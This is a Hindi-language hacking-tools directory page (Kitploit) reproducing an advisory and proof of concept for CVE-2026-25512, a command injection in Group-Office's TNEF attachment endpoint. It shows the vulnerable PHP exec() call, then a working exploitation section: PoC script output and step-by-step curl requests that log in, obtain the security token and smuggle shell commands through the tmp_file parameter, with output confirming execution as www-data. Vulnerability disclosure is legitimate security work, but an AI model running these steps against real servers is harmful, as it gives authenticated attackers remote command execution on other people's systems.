Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25512 — RCE - टीएनईएफ अटैचमेंट हैंडलर के माध्यम से कमांड इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/numberoreo1/cve-2026-25512
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnumberoreo1/cve-2026-25512

CVE-2026-25512

RCE - टीएनईएफ अटैचमेंट हैंडलर के माध्यम से कमांड इंजेक्शन

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25512: TNEF हैंडलर में कमांड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन - Group-Office

CVE-2026-25512 Critical CVSS 9.4

CWE-78

CVSS 4.0 वेक्टर : CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

विषय-सूची

  • सारांश
  • प्रभावित संस्करण
  • तकनीकी विवरण
    • मूल कारण
    • स्रोत से सिंक प्रवाह
  • शोषण
    • स्वचालित शोषण
    • मैन्युअल शोषण
  • प्रभाव
  • समयरेखा
  • श्रेय
  • संदर्भ

  • सारांश

    Group-Office में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता की पहचान की गई थी। एंडपॉइंट email/message/tnefAttachmentFromTempFile उपयोगकर्ता-नियंत्रित पैरामीटर tmp_file को सीधे exec() कॉल में जोड़ता है। tmp_file में शेल मेटाकैरेक्टर इंजेक्ट करके, एक प्रमाणित हमलावर सर्वर पर मनमाने सिस्टम कमांड निष्पादित कर सकता है।


    प्रभावित संस्करण

    उत्पादप्रभावित संस्करण
    Group-Office≤ 26.0.4

    तकनीकी विवरण

    मूल कारण

    tmp_file पैरामीटर HTTP अनुरोध से लिया जाता है और बिना एस्केपिंग या सत्यापन के एक शेल कमांड बनाने के लिए उपयोग किया जाता है। इसके परिणामस्वरूप tnef निष्कर्षण कमांड में कमांड इंजेक्शन होता है, जो वेब सर्वर के विशेषाधिकारों के साथ चलता है।

    भेद्य कोड (www/modules/email/controller/MessageController.php):

    root@kitploit:~
    protected function actionTnefAttachmentFromTempFile(array $params)
    {
        $tmpFolder = \GO\Base\Fs\Folder::tempFolder(uniqid(time()));
        $tmpFile = new \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file']);
    
        chdir($tmpFolder->path());
        exec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), $output, $retVar);
        if($retVar!=0)
            throw new \Exception("TNEF extraction failed: ".implode("\n", $output));
    
        exec(GO::config()->cmd_zip.' -r "winmail.zip" *', $output, $retVar);
        if($retVar!=0)
            throw new \Exception("ZIP compression failed: ".implode("\n", $output));
    
        $zipFile = $tmpFolder->child('winmail.zip');
        \GO\Base\Util\Http::outputDownloadHeaders($zipFile,false,true);
        $zipFile->output();
    
        $tmpFolder->delete();
    }
    

    स्रोत से सिंक प्रवाह

    चरणविवरण
    स्रोतindex.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=... में tmp_file क्वेरी पैरामीटर
    प्रसारnew \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file'])
    सिंकexec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), ...)

    चूँकि tmp_file को शेल कमांड में जोड़ा जाता है, ;, &, बैकटिक्स, या $() जैसे मेटाकैरेक्टर हमलावर को मनमाने कमांड जोड़ने की अनुमति देते हैं।

    प्रमाणीकरण आवश्यकता: हाँ। MessageController एक security_token CSRF जाँच लागू करता है, इसलिए एक वैध सत्र + टोकन आवश्यक हैं।


    शोषण

    स्वचालित शोषण

    PoC स्क्रिप्ट लॉगिन करती है, security_token प्राप्त करती है, tmp_file के माध्यम से एक पेलोड इंजेक्ट करती है, और ZIP प्रतिक्रिया से rce.txt पढ़कर निष्पादन की पुष्टि करती है।

    root@kitploit:~
    python3 poc.py
    

    उदाहरण आउटपुट:

    root@kitploit:~
    ➜  ~ python3 poc.py
    [*] Target: http://xx.xx.xxx.xxx:9090
    [*] Login status: 200
    [*] Login ok, security_token received
    [*] Exploit URL: http://xx.xx.xxx.xxx:9090/index.php?r=email/message/tnefAttachmentFromTempFile
    [*] tmp_file payload: dummy.dat;id > /tmp/id;id > rce.txt;echo RCE_POC_451a735c >> rce.txt;#
    [*] Response status: 200
    [+] RCE Confirmed
    [+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    मैन्युअल शोषण

    चरण 1: लॉगिन

    root@kitploit:~
    curl -c cookies.txt -b cookies.txt "http://TARGET:PORT/index.php" \
        --data-urlencode "r=core/auth/login" \
        --data-urlencode "username=YOUR_USERNAME" \
        --data-urlencode "password=YOUR_PASSWORD" \
        -H "X-Requested-With: XMLHttpRequest"
    

    प्रतिक्रिया:

    root@kitploit:~
    {
      "success": true,
      "groupoffice_version": "26.0.4",
      "user_id": 2,
      "security_token": "XXXXXXX",
      "sid": "XXXXXXXXXXX"
    }
    

    चरण 2: RCE ट्रिगर करें

    root@kitploit:~
    curl -G "http://TARGET:PORT/index.php" \
        -b cookies.txt \
        --data-urlencode "r=email/message/tnefAttachmentFromTempFile" \
        --data-urlencode "security_token=YOUR_TOKEN" \
        --data-urlencode "tmp_file=dummy.dat;id > rce.txt || true;#" \
        -o command_output.zip
    

    परिणाम:

    root@kitploit:~
    ➜  unzip command_output.zip
    Archive:  command_output.zip
      inflating: rce.txt
    
    ➜  cat rce.txt
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    प्रभाव

    श्रेणीगंभीरताविवरण
    गोपनीयताउच्चमनमाना कमांड निष्पादन संवेदनशील फ़ाइलों को पढ़ने की अनुमति देता है।
    अखंडताउच्चहमलावर सर्वर फ़ाइलों को संशोधित या हटा सकता है।
    उपलब्धताउच्चहमलावर सेवाओं को बाधित कर सकता है या महत्वपूर्ण डेटा हटा सकता है।

    श्रेय

    • खोजकर्ता: Oreo

    संदर्भ

    • Group-Office आधिकारिक वेबसाइट
    • MITRE CVE-2026-25512
    टूल डाउनलोड करें